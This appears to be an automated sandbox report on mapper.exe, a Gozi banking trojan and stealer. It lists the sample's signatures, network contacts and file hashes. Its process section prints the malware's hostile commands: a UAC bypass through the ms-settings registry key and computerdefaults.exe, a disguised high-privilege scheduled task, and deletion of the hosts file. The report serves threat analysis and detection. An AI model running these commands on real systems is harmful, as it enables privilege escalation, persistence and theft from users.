Malware Analysis Report

2025-01-22 18:50

Sample ID 240310-q3v1fsdg85
Target mapper.exe
SHA256 27ac4656ed2ddbae711ea1fc0a4ec7277c65015166997304bf9ff53622f69fc5
Tags
gozi banker isfb spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

27ac4656ed2ddbae711ea1fc0a4ec7277c65015166997304bf9ff53622f69fc5

Threat Level: Known bad

The file mapper.exe was found to be: Known bad.

Malicious Activity Summary

gozi banker isfb spyware stealer trojan

Gozi

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-10 13:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-10 13:47

Reported

2024-03-10 13:50

Platform

win11-20240221-en

Max time kernel

157s

Max time network

160s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi

banker trojan gozi

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\playistanbul8910.vbs" C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1440 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 332 wrote to memory of 2880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 332 wrote to memory of 2880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 332 wrote to memory of 2880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 2880 wrote to memory of 1204 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 2880 wrote to memory of 1204 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 2880 wrote to memory of 1204 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 1440 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1140 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1140 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1204 wrote to memory of 416 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 416 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 416 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Users\Admin\AppData\Local\Temp\uexylubw.exe
PID 1440 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Users\Admin\AppData\Local\Temp\uexylubw.exe
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\mapper.exe

"C:\Users\Admin\AppData\Local\Temp\mapper.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C computerdefaults.exe

C:\Windows\SysWOW64\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC ONLOGON /TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Users\Admin\AppData\Local\Temp\uexylubw.exe

"C:\Users\Admin\AppData\Local\Temp\uexylubw.exe" explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.211.130.173:80 checkip.amazonaws.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/1440-0-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/1440-1-0x0000000074FA0000-0x0000000075751000-memory.dmp

memory/1440-2-0x00000000051D0000-0x00000000051EA000-memory.dmp

memory/1440-3-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-4-0x00000000051B0000-0x00000000051BA000-memory.dmp

memory/1440-5-0x00000000052D0000-0x0000000005362000-memory.dmp

memory/1440-6-0x0000000005920000-0x0000000005EC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs

MD5 a34267102c21aff46aecc85598924544
SHA1 77268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256 eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA512 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

memory/1440-10-0x000000000AF80000-0x000000000BB80000-memory.dmp

memory/1440-11-0x0000000013110000-0x0000000013DB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll

MD5 6f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1 fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA256 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512 fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

memory/1440-17-0x0000000074FA0000-0x0000000075751000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uexylubw.exe

MD5 e898826598a138f86f2aa80c0830707a
SHA1 1e912a5671f7786cc077f83146a0484e5a78729c
SHA256 df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA512 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

memory/3288-27-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/3288-28-0x0000000001000000-0x0000000001001000-memory.dmp

memory/3288-29-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/3288-31-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/1440-32-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-33-0x0000000007BE0000-0x0000000007BF2000-memory.dmp

memory/3288-34-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/1440-40-0x0000000008D20000-0x0000000008D86000-memory.dmp

memory/1440-41-0x0000000007C70000-0x0000000007C7A000-memory.dmp

memory/1440-42-0x0000000009780000-0x000000000978A000-memory.dmp

memory/1440-43-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-44-0x000000000A010000-0x000000000A01C000-memory.dmp

memory/1440-45-0x000000000A030000-0x000000000A038000-memory.dmp

C:\Users\Admin\AppData\Roaming\Gongle\aTRGSC3JE0\zs0352kg.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

MD5 fff5eb5a53db55c85c85fc41d144815d
SHA1 09b5e0186222149a0ef108ffbebdb2e111634170
SHA256 71bf91d50e222b6caa468c6460f283782fc0fe1fdbce2c5b792537d9ac6e30df
SHA512 41c9a5247b44928587eda20dd1a5586d94fd7f9fb757317370328d34077a08fa0196380bcf41bbc028f48e0c7b6083d9f1c7baf86859684c0167cb8ac11d1e1b

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\LOG

MD5 29959ce422bfb88f442554b41a7709ac
SHA1 379ad8c6c2a7f26dd6e2522868e06a1b2c1eface
SHA256 54d337d50fbfa42a02e59d9fefd9ccb05a314dbce6b35ade1331323e306c46ba
SHA512 b3711f90b358d06282870d1ad4c7d4abb38f2495fd6d365cc2e2bae31b3665b2067aaeefe8dd2eb339284600bd640dd5cfd46d13e14458936c9b5ba61a342861

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\LOG.old

MD5 73754ce7719bcede3b39c4823f75cd34
SHA1 385a014c795ea7a7f40390e9b88202832eaf41de
SHA256 7311aa34aeff9e8f9167e311742047b3d597d178327db7f5f31f8d2e73a7b8b3
SHA512 bccc1c596d3518416c66ba0401bc9b0439dd4bfcc7a128caa46b7e23f410ec31ae3d9c665615ffa38e1eb0e86ff676c80d8f26fce8672e8e204066dcac457d4d

C:\Users\Admin\AppData\Roaming\Gongle\a1YO5KAVIZ\LOG

MD5 49c9eeda4f0cb5719057b7f0d5c66897
SHA1 2737971dfe881483dc9aedaa3a5f95a1e3d92a72
SHA256 d8afbacc8e5a6978a15f73c90d5f69460a9a292c560c90cb4f8828c90bf01beb
SHA512 a72ce1e0afa087d25e8feb0dcad2a60c361ff07e1849cc998a76b2c7142cd78f3880320f51ff843304da89711b07092dabce723cffe02de0faa8418628da1752

C:\Users\Admin\AppData\Roaming\Gongle\a1YO5KAVIZ\LOG.old

MD5 dbb1ce7f0195c099b9354b75faea84d8
SHA1 6613f39a9ca1e51402a63362940dcd504a12e33d
SHA256 4cb7f61eccf9831bfb3ad88bcc106b78589a4bb88554abcd47faeab20d897771
SHA512 0e9a2de7bcda8c35f66ff10c2966e2eb800eedc5b79732bd3b6fac5a0061eacf75879b82b36ab95377cfc226d0e453476928de5420dddab6ac98765f11fb2077

memory/1440-173-0x0000000006A00000-0x0000000006AB2000-memory.dmp

memory/1440-174-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1440-175-0x000000000A0C0000-0x000000000A136000-memory.dmp

memory/1440-176-0x000000000A060000-0x000000000A07E000-memory.dmp

memory/1440-177-0x000000000A1E0000-0x000000000A230000-memory.dmp

memory/1440-178-0x000000000A230000-0x000000000A29A000-memory.dmp

memory/1440-179-0x000000000CB80000-0x000000000CED7000-memory.dmp

memory/1440-180-0x000000000A190000-0x000000000A1DC000-memory.dmp

memory/1440-185-0x0000000000F30000-0x0000000000F51000-memory.dmp

memory/1440-184-0x0000000001020000-0x000000000105C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\377bbc2f4ebc48449ef15e76af6ed62e

MD5 cbc22106cb58d19e60802ae62409431e
SHA1 dedaeecbffba3a0e7778c27be9b93cf4bd0911f4
SHA256 50eb464af9b22b753718e55c09fe92dc59b034c65f97a0d4c49a902eaaeb981f
SHA512 7e017579b2e697f3a95536a2a3f26f4413a600bad3a61feb9ce8a619f7892c30e7efcaf085c1fbd5f5bc70f024bb945cbc35345d188edf6786f70bbeb007f58e

C:\Users\Admin\AppData\Local\Temp\9d825a42c2814b8d8883e5c3e62cefb0

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/1440-200-0x0000000001080000-0x000000000108A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\de77c69f2032457cafe52bb7a5364409

MD5 3f3e4c7565f42d3e6342ee3cc7d10676
SHA1 f4bc0666699229458509799f42e140ae824572a8
SHA256 94eedc0985692704d2358ace9e5f1f875ab9ad1e013a8cfa02cbef3106ea8f74
SHA512 9181df1ed6e29387c99a868abe47c7e277c2f0a62e91b1ee6f52c19304d1d79e155472a25281785b83e385e64cb9de88c850cec57293ef03d4f6ad2e79b85148

memory/1440-204-0x00000000052C0000-0x00000000052D0000-memory.dmp